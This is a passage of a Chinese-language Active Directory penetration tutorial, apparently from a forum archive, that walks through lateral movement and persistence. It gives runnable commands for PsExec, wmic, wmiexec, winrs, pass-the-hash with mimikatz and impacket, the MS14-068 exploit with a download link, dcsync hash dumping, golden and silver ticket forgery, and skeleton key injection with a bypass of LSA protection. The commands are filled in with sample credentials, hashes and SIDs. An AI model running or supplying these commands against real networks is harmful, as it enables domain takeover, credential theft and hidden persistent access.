<img width="552" height="141" src="https://www.2k8.org/content/uploadfile/202203/17/0f83c5af.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
net use //查看ipc 连接状态

</div>
 

<div style="page:WordSection22;">

<img width="551" height="255" src="https://www.2k8.org/content/uploadfile/202203/17/8fd73548.jpg" alt="" style="vertical-align:middle;" />



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="559" height="257" src="https://www.2k8.org/content/uploadfile/202203/17/f7d63761.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



 


2、若未建立 IPC 连接，则要使用账号密码进行登录


PsExec.exe \\192.168.19.178 -u adtest\jeff1 -p test@123 cmd.exe



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="553" height="205" src="https://www.2k8.org/content/uploadfile/202203/17/46806b7a.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 


</div>
 

<div style="page:WordSection23;">
<h2 style="margin-top:.7pt;punctuation-wrap:simple;tab-stops:44.8pt;">
<a name="4.2.2 WMI"></a>4.2.2    WMI
</h2>

 


WMI(Windows Management Instrumentation ， Windows 管理规范) 是一项核心的


Windows 管理技术；用户可以使用WMI 管理本地和远程计算机。


 


 

<h4 style="margin-bottom:.0001pt;margin-left:48.15pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
<a name="4.2.2.1 WMI利用条件"></a>4.2.2.1   WMI 利用条件
</h4>

 


1、WMI 服务开启（默认开启）


2、135 端口未被过滤


<img width="558" height="271" src="https://www.2k8.org/content/uploadfile/202203/17/59113a19.jpg" alt="" style="vertical-align:middle;" />


 


 

<h4 style="margin-left:51.25pt;punctuation-wrap:simple;tab-stops:51.3pt;text-indent:-45.3pt;">
<a name="4.2.2.2 利用wmic进行横向移动"></a>4.2.2.2    利用wmic 进行横向移动
</h4>

 


利用系统自带的工具 wmic 在目标主机上执行任意命令


 


wmic /node:192.168.19.178 /user:adtest\jeff1 /password:test@123 process call create "calc"



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="555" height="200" src="https://www.2k8.org/content/uploadfile/202203/17/63817a75.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
缺点：无法回显命令

</div>
 

<div style="page:WordSection24;">
<h4 style="margin-bottom:.0001pt;margin-left:6.0pt;margin-right:0cm;margin-top:1.2pt;punctuation-wrap:simple;text-indent:0cm;">
<a name="4.2.2.2 wmiexec.vbs"></a>4.2.2.2 wmiexec.vbs
</h4>

 

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">

<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="552" height="244" src="https://www.2k8.org/content/uploadfile/202203/17/7b0f7eb7.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
wmiexec.vbs 是为了解决 wmic 无法回显命令而开发的一个工具，原理就是把数据先存到一个临时文件中，在每次读取完执行结果后就自动删除。可以用来回显执行命令的结果和获取半交互式的shell


 



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="548" height="263" src="https://www.2k8.org/content/uploadfile/202203/17/7faa2414.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
cscript wmiexec.vbs /cmd 192.168.19.178 adtest\jeff1 test@123 whoami

</div>
 

<div style="page:WordSection25;">


<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="557" height="243" src="https://www.2k8.org/content/uploadfile/202203/17/3dcc19ee.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
cscript wmiexec.vbs /shell 192.168.19.178 adtest\jeff1 test@123


 


 

<h2 style="punctuation-wrap:simple;tab-stops:44.8pt;">
<a name="4.2.3 WinRM"></a>4.2.3    WinRM
</h2>

 


WinRM(Windows Remote Management)是 Microsoft 对WS-Management 协议的实现， WS-Management 协议即一种基于标准简单对象访问协议（soap）的防火墙友好协议，它让来自不同供应商的硬件和操作系统能够相互操作。windows 众多可以远程执行命令方式中的一种。


 


 

<h4 style="margin-left:48.15pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
<a name="4.2.3.1 WinRM利用条件"></a>4.2.3.1   WinRM 利用条件
</h4>

 


1、适用于win7 及以后的系统，win7 和server 08 默认关闭


2、server 12 之后的版本才默认允许远程任意主机进行管理



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="557" height="119" src="https://www.2k8.org/content/uploadfile/202203/17/4653a61c.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
3、防火墙未过滤 5985、5986 端口


 


 

<h4 style="punctuation-wrap:simple;tab-stops:48.15pt;">
<a name="4.2.3.2 WINRS"></a>4.2.3.2   WINRS
</h4>

 


winrs(windows remote shell)是WinRM 的客户端,需要管理员权限才能运行，可直接执行命令，也可以返回交互式 shell

</div>
 

<div style="page:WordSection26;">


<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="556" height="387" src="https://www.2k8.org/content/uploadfile/202203/17/39f75716.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
winrs -r:192.168.19.100 -u:adtest\administrator -p:admin@124 "cmd”


 


winrs -r:192.168.19.100 -u:adtest\administrator -p:admin@124 whoami



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="556" height="85" src="https://www.2k8.org/content/uploadfile/202203/17/22383b9a.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



 


 

<h4 style="margin-left:48.15pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
<a name="4.2.3.3 Powershell Invoke-Command"></a>4.2.3.3   Powershell Invoke-Command
</h4>

 


PS C:\Users\jeff1> Invoke-Command -ComputerName 192.168.19.100 -ScriptBlock {whoami}


-credential adtest\administrator

</div>
 

<div style="page:WordSection27;">

<img width="553" height="289" src="https://www.2k8.org/content/uploadfile/202203/17/9a9b78f1.png" alt="" style="vertical-align:middle;" />


 


<img width="555" height="53" src="https://www.2k8.org/content/uploadfile/202203/17/c3764528.png" alt="" style="vertical-align:middle;" />


 


 

<h2 style="margin-top:1.3pt;punctuation-wrap:simple;tab-stops:44.8pt;">
<a name="4.2.4 PTH(pass the hash)"></a>4.2.4    PTH(pass the hash)
</h2>

 


PTH(pass the hash,hash 传递)攻击是指攻击者可以直接通过 LM Hash(已弃用)或 NTLM Hash 访问远程主机或服务，而不提供明文密码。

</div>
 

<div style="page:WordSection28;">
<h4 style="margin-bottom:.0001pt;margin-left:48.15pt;margin-right:0cm;margin-top:1.2pt;punctuation-wrap:simple;tab-stops:48.2pt;text-indent:-42.2pt;">
<a name="4.2.4.1 Mimikatz"></a>4.2.4.1   Mimikatz
</h4>

 



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="555" height="227" src="https://www.2k8.org/content/uploadfile/202203/17/286608e6.png" alt="" style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



 

</div>
 

<div style="page:WordSection29;">
<p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;tab-stops:92.85pt 145.25pt 247.0pt 378.35pt;text-autospace:none;">
mimikatz               #               sekurlsa::pth               /user:administrator                             /domain:.


/ntlm:c5113714efbff7fa196f2e2b50938a8f



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="556" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/c40634bc.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



 


 

<h4 style="punctuation-wrap:simple;tab-stops:48.15pt;">
<a name="4.2.4.2 impacket-examples-windows"></a>4.2.4.2   impacket-examples-windows
</h4>

 


impacket-examples-windows 是 impacket（网络协议工具包）的 windows 版本，包含了几十款工具，这里使用wmiexec.exe 来演示 pth 攻击。


wmiexec.exe                                                                                                             -hashes


b084e803561e306bff17365faf1ffe89:db23832fd3822fcaea5c019f090fe752 <a href="mailto:ADTEST/[email protected]">ADTEST/[email protected] </a>"whoami"



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="552" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/1f6431d6.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



 


<img width="548" height="297" src="https://www.2k8.org/content/uploadfile/202203/17/37ff9053.jpg" alt="" style="vertical-align:middle;" />

</div>
 

<div style="page:WordSection30;">

下载地址：


impacket-examples-windows： <a href="https://github.com/maaaaz/impacket-examples-windows/releases">https://github.com/maaaaz/impacket-examples-windows/releases</a> impacket：


<a href="https://github.com/SecureAuthCorp/impacket">https://github.com/SecureAuthCorp/impacket</a>


 

<h2 style="margin-bottom:.0001pt;margin-left:6.0pt;margin-right:0cm;margin-top:1.3pt;punctuation-wrap:simple;text-indent:0cm;">
<a name="4.2.5 MS14-068"></a>4.2.5 MS14-068
</h2>

 


MS14-068 是一个能够使普通用户提权获取域控权限的权限提升漏洞，微软给出的补丁是 kb3011780。在 server 2000 以上的域控中，只要没打这个补丁，都有可能被利用。


 



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="181" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="556" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/c40634bc.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
1、尝试直接访问域控的 C 盘


 


2、使用 ms14-068 的 exp，生成票据


C:\Users\jeff1\Desktop>MS14-068.exe -u <a href="mailto:[email protected]">[email protected] </a>-s S-1-5-21-3418659180-3 421952656-1938706522-1109 -d 192.168.19.100 -p test@124

</div>
 

<div style="page:WordSection31;">

<img width="558" height="310" src="https://www.2k8.org/content/uploadfile/202203/17/1e92c86d.jpg" alt="" style="vertical-align:middle;" />


 


3、使用 mimilatz 导入生成的 ccache 文件，导入之前 cmd 下使用命令 klist purge 或者在



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="559" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/14664fd8.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
mimikatz 中使用 kerberos::purge 删除当前缓存的 kerberos 票据


 


导入票据：


kerberos::ptc <a href="mailto:[email protected]">[email protected]</a>

</div>
 

<div style="page:WordSection32;">

<img width="551" height="323" src="https://www.2k8.org/content/uploadfile/202203/17/2a064b7a.png" alt="" style="vertical-align:middle;" />


 


4、再次访问域控



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="560" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/84db0a11.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



MS14-068 下载地址：


<a href="https://github.com/abatchy17/WindowsExploits/raw/master/MS14-068/MS14-068.exe">https://github.com/abatchy17/WindowsExploits/raw/master/MS14-068/MS14-068.exe</a>


 


 

<h2 style="margin-top:1.25pt;punctuation-wrap:simple;tab-stops:44.8pt;">
<a name="4.2.6 web漏洞"></a>4.2.6    web 漏洞
</h2>

 


当我们通过以上方法无法进行横向移动的时候，只能回到 web。通过扫描内网 web 应用，通过web 漏洞再进一步进行横向移动，常见能直接获得webshell 的漏洞如下：


 

<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  struts2 远程代码执行

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  weblogic 反序列化漏洞

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  weblogic 弱口令

<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  tomcat 弱口令

</div>
 

<div style="page:WordSection33;">
<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:2.05pt;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  shiro 远程代码执行

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  phpstudy 后门

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  fastjson 远程代码执行

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  sql 注入

<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  等等


 


 

<h2 style="margin-left:48.35pt;punctuation-wrap:simple;tab-stops:48.4pt;text-indent:-42.4pt;">
<a name="4.2.7 系统漏洞"></a>4.2.7      系统漏洞
</h2>

 


当内网没有 web 应用的时候，可以尝试通过一些系统漏洞来进行横向移动，通常不建议使用此类漏洞，因为很容易导致服务器蓝屏，常见漏洞如下：

<p style="font-family:等线;font-size:12.0pt;line-height:15.5pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  MS08-067

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  MS17-010

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  CVE-2019-0708

<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:48.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:48.05pt;text-autospace:none;text-indent:-21.05pt;">
Ø  等等


 


 

<h1 style="line-height:normal;punctuation-wrap:simple;tab-stops:51.1pt;">
<a name="5、权限维持"></a>5、  权限维持
</h1>

 

<h3 style="punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="5.1 黄金票据"></a>5.1      黄金票据
</h3>

 

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
黄金票据（Golden Ticket）是有效的 TGT(TicketGranting Ticket)票据，是由 KERBEROS 账户（KBRTGT）加密的。用于域控权限掉后，想再重新获取。因为域管的密码可能更改，通常 kbrtgt 账户不会有人去过问。


 


 

<h3 style="margin-bottom:.0001pt;margin-left:46.2pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
<a name="5.1.1 制作黄金票据的前提条件"></a>5.1.1      制作黄金票据的前提条件
</h3>

 


1、域名称


2、域的SID


3、域的KRBTGT 账户的密码 hash 值


4、伪造的用户名，可以是任意用户甚至是不存在的用户


 

<h3 style="margin-left:46.2pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
<a name="5.1.2 黄金票据利用"></a>5.1.2      黄金票据利用
</h3>

 


1、导出 krbtgt 密码 hash


mimikatz#lsadump::dcsync /domain:adtest.com /user:krbtgt

</div>
 

<div style="page:WordSection34;">

<img width="551" height="610" src="https://www.2k8.org/content/uploadfile/202203/17/4e4e5178.png" alt="" style="vertical-align:middle;" />


 


导出所有域内用户密码 hash 值：


mimikatz#lsadump::dcsync /domain:adtest.com /all /csv

</div>
 

<div style="page:WordSection35;">

<img width="552" height="308" src="https://www.2k8.org/content/uploadfile/202203/17/a8ca76f3.png" alt="" style="vertical-align:middle;" />


 


2、获取域 SID



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="555" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/b643f7cc.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
在导出 krbtgt 的 hash 的时候已经包含了域SID，也可以用以下命令来查看域 SID whoami /all


 


3、伪造黄金票据


 

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.7pt;margin-top:0cm;punctuation-wrap:simple;tab-stops:76.4pt 160.6pt 232.2pt 251.65pt 353.85pt;text-autospace:none;">
mimikatz.exe    privilege::debug    "kerberos::golden                        /domain:adtest.com                     /sid:S-1-5-21- 3418659180-3421952656-1938706522                 /target:WIN-9P499QKTLDO.ADTEST.COM


/service:cifs /rc4: 6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt"


 


这里可以不指定target 和service

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.8pt;margin-top:0cm;punctuation-wrap:simple;tab-stops:122.6pt 232.75pt;text-autospace:none;text-indent:20.95pt;">
kerberos::golden      /domain:adtest.com      /sid:S-1-5-21-3418659180-3421952656- 1938706522 /rc4:6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt

</div>
 

<div style="page:WordSection36;">

<img width="551" height="442" src="https://www.2k8.org/content/uploadfile/202203/17/cdba4a13.png" alt="" style="vertical-align:middle;" />


 


使用 klist 查看本地缓存的票据


<img width="556" height="352" src="https://www.2k8.org/content/uploadfile/202203/17/851b90f0.png" alt="" style="vertical-align:middle;" />


获得票据后可直接通过dir 远程访问主机，可以直接使用ipc 进行连接：

</div>
 

<div style="page:WordSection37;">

<img width="556" height="359" src="https://www.2k8.org/content/uploadfile/202203/17/db751dff.png" alt="" style="vertical-align:middle;" />


 



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="555" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/b643f7cc.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
当然也可以使用psexec 去获得一个 cmdshell：


 


注：普通黄金票据不能跨域使用；TGT 有效时间为 20 分钟；。

</div>
 

<div style="page:WordSection38;">

 

<h3 style="margin-top:9.2pt;punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="5.2 白银票据"></a>5.2      白银票据
</h3>

 


黄金票据是伪造 TGT，白银票据（Silver Tickets）是伪造 ST(Service Ticket)，因为 TGT 在


pac 里面限定了给Client 授权的服务，所以银票只能访问指定的服务。


 


 

<h3 style="margin-left:46.2pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
<a name="5.2.1 伪造白银票据的前提条件"></a>5.2.1      伪造白银票据的前提条件
</h3>

 


1、域名称


2、域的SID


3、域的服务账号的密码 hash


4、伪造的用户名（可以是任意的）


 

<h3 style="margin-left:46.2pt;punctuation-wrap:simple;tab-stops:46.25pt;text-indent:-40.25pt;">
<a name="5.2.2 白银票据的利用"></a>5.2.2      白银票据的利用
</h3>

 


在黄金票据中我们可以不指定 target 和 service，但是在白银票据中必须指定 target 和


service


mimikatz.exe privilege::debug "kerberos::golden /domain:adtest.com /sid:S-1-5-21- 3418659180-3421952656-1938706522 /target:WIN-9P499QKTLDO.ADTEST.COM



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="552" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/1f6431d6.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
/service:cifs /rc4:22eec3fbe7191bdcf1e5819f8bdcd951 /user:aaa /ptt"

</div>
 

<div style="page:WordSection39;">

<img width="553" height="706" src="https://www.2k8.org/content/uploadfile/202203/17/ea4b6a5c.png" alt="" style="vertical-align:middle;" />


 


 


 

<h3 style="margin-bottom:.0001pt;margin-left:30.5pt;margin-right:0cm;margin-top:1.3pt;punctuation-wrap:simple;tab-stops:30.5pt;text-indent:-24.5pt;">
<a name="5.3 skeleton key"></a>5.3   skeleton key
</h3>

 


skeleton key（万能钥匙）就是给所有域内用户添加一个相同的密码，域内所有的用户都可以使用这个密码进行认证，同时原始密码也可以使用，其原理是对lsass.exe  进行注入，所以重启后会失效。

</div>
 

<div style="page:WordSection40;">

1、在域控上安装skeleton key



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="556" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/c40634bc.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
mimikatz.exe privilege::debug "misc::skeleton"


 


2、在域内其他机器尝试使用 skeleton key 去访问域控添加的密码是 mimikatz


C:\Users\jeff1>net use \\WIN-9P499QKTLDO.adtest.com\c$ mimikatz /user:adtest\adm inistrator

</div>
 

<div style="page:WordSection41;">

<img width="557" height="538" src="https://www.2k8.org/content/uploadfile/202203/17/706eadf8.png" alt="" style="vertical-align:middle;" />


 


3、微软在 2014 年 3 月 12 日添加了 LSA 爆护策略，用来防止对进程lsass.exe 的代码注入。如果直接尝试添加skelenton key 会失败。


 


适用系统：


windows 8.1


windows server 2012 及以上



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="553" height="3" src="https://www.2k8.org/content/uploadfile/202203/17/eac8cdc5.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 


</div>
 


当然 mimikatz 依旧可以绕过，命令如下：


privilege::debug


!+


!processprotect /process:lsass.exe /remove misc::skeleton


 

</div>

页: [1]

中国网络渗透测试联盟's Archiver

域渗透技能大全